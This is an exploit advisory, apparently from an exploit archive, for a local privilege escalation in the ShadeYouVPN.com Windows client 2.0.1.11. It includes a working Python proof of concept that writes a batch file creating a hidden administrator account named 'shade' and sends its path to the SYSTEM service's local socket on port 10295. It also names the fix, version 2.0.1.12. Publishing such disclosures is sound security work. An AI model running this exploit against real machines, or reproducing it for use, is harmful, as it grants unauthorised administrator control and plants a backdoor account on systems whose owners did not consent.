ShadeYouVPN.com Client For Windows 2.0.1.11 Privilege Escalation

2017.02.15
Credit: Kacper Szurek
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation # Date: 14.02.2017 # Software Link: https://shadeyouvpn.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: local 1. Description `ShadeYou` service executes any file path send through socket without verification as SYSTEM user. https://security.szurek.pl/shadeyouvpncom-client-v20111-for-windows-privilege-escalation.html 2. Proof of Concept import socket import tempfile print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation" print "by Kacper Szurek" print "https://security.szurek.pl/" print "https://twitter.com/KacperSzurek" t = tempfile.TemporaryFile(delete=False, suffix='.bat') t.write("net user shade /add\n") t.write("net localgroup administrators shade /add") t.close() s = socket.socket() s.connect(("127.0.0.1", 10295)) s.send("s||config|"+t.name+"|ccccc|ddddd|eeee|ffff|\r\n") print s.recv(1024) print s.recv(1024) 3. Solution Update to version 2.0.1.12


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top